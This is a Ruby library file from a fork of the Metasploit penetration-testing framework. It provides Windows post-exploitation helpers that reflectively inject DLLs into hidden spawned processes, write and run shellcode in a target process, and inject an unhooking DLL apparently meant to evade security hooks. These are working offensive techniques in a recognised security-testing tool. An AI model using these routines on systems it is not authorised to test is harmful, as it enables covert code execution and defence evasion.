adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/lib/msf/core/post/windows/process.rb
T
adfoster-r7 48f40077ea Add get processes requirement
2021-12-13 13:46:54 +00:00

171 lines
6.0 KiB
Ruby
Raw Blame History

# -*- coding: binary -*-
module Msf
class Post
module Windows
module Process
include Msf::Post::Windows::ReflectiveDLLInjection
include Msf::Post::Process
def initialize(info = {})
super(
update_info(
info,
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_sys_config_getenv
stdapi_sys_config_sysinfo
stdapi_sys_process_attach
stdapi_sys_process_execute
stdapi_sys_process_getpid
stdapi_sys_process_get_processes
stdapi_sys_process_memory_allocate
stdapi_sys_process_memory_protect
stdapi_sys_process_memory_write
stdapi_sys_process_thread_create
]
}
}
)
)
end
# Checks the architecture of a payload and PID are compatible
# Returns true if they are false if they are not
def arch_check(test_arch, pid)
# get the pid arch
client.sys.process.processes.each do |p|
# Check Payload Arch
if pid == p["pid"]
return test_arch == p['arch']
end
end
end
# returns the path to the notepad process based on syswow extension
def get_notepad_pathname(bits, windir, client_arch)
if bits == ARCH_X86 and client_arch == ARCH_X86
cmd = "#{windir}\\System32\\notepad.exe"
elsif bits == ARCH_X64 and client_arch == ARCH_X64
cmd = "#{windir}\\System32\\notepad.exe"
elsif bits == ARCH_X64 and client_arch == ARCH_X86
cmd = "#{windir}\\Sysnative\\notepad.exe"
elsif bits == ARCH_X86 and client_arch == ARCH_X64
cmd = "#{windir}\\SysWOW64\\notepad.exe"
end
return cmd
end
#
# Injects a reflective DLL into a process, and executes it.
#
# @param rdll_path [String] The path to the DLL to inject
# @param param [String, Integer, nil] The parameter to pass to the DLL's entry point. If this value is a String
# then it will first be written into the process memory and then passed by reference. If the value is an Integer,
# then the value will be passed as is. If the value is nil, it'll be passed as a NULL pointer.
# @param pid [Integer] The process ID to inject to, if unspecified, a new instance of a random EXE from the
# process_list array will be launched to host the injected DLL.
def execute_dll(rdll_path, param=nil, pid=nil)
process_list = ['msiexec', 'netsh']
if pid.nil?
# Get a random process from the process list to spawn.
process_cmd = process_list.sample
# Use Rex's PeParsey as per Spencer's suggestion to determine the true architecture of the DLL we are injecting.
pe = Rex::PeParsey::Pe.new_from_file(rdll_path, true)
arch = pe.hdr.file['Machine'].value
# If the DLL is x86 but the host architecture is x64, then launch a 32 bit WoW64 binary to inject into.
if (arch == Rex::PeParsey::PeBase::IMAGE_FILE_MACHINE_I386) && (session.sys.config.sysinfo['Architecture'] == ARCH_X64)
windir = session.sys.config.getenv('windir')
process_cmd = "#{windir}\\SysWOW64\\#{process_cmd}.exe"
end
print_status("Launching #{process_cmd} to host the DLL...")
host_process = client.sys.process.execute(process_cmd, nil, { 'Hidden' => true })
begin
process = client.sys.process.open(host_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_error('Operation failed. Trying to inject into the current process...')
process = client.sys.process.open
end
else
process = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
end
print_status("Reflectively injecting the DLL into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, ::File.expand_path(rdll_path))
if param.is_a?(String)
# if it's a string, treat it as data and copy it into the remote process then pass it by reference
param_ptr = inject_into_process(process, param)
elsif param.is_a?(Integer)
param_ptr = param
elsif param.nil?
param_ptr = 0
else
raise TypeError, 'param must be a string, integer or nil'
end
process.thread.create(exploit_mem + offset, param_ptr)
nil
end
#
# Injects shellcode to a process, and executes it.
#
# @param shellcode [String] The shellcode to execute
# @param base_addr [Integer] The base address to allocate memory
# @param pid [Integer] The process ID to inject to, if unspecified, the shellcode will be executed in place.
#
# @return [Boolean] True if successful, otherwise false
#
def execute_shellcode(shellcode, base_addr=nil, pid=nil)
pid ||= session.sys.process.getpid
host = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
if base_addr.nil?
shell_addr = host.memory.allocate(shellcode.length)
else
shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
end
host.memory.protect(shell_addr)
if host.memory.write(shell_addr, shellcode) < shellcode.length
vprint_error("Failed to write shellcode")
return false
end
vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
thread = host.thread.create(shell_addr,0)
unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
vprint_error("Unable to create thread")
nil
end
thread
end
def inject_unhook(proc, bits, delay_sec)
if bits == ARCH_X64
dll_file_name = 'x64.dll'
elsif bits == ARCH_X86
dll_file_name = 'x86.dll'
else
return false
end
dll_file = MetasploitPayloads.meterpreter_ext_path('unhook', dll_file_name)
dll, offset = inject_dll_into_process(proc, dll_file)
proc.thread.create(dll + offset, 0)
Rex.sleep(delay_sec)
end
end # Process
end # Windows
end # Post
end # Msf
Reference in New Issue View Git Blame Copy Permalink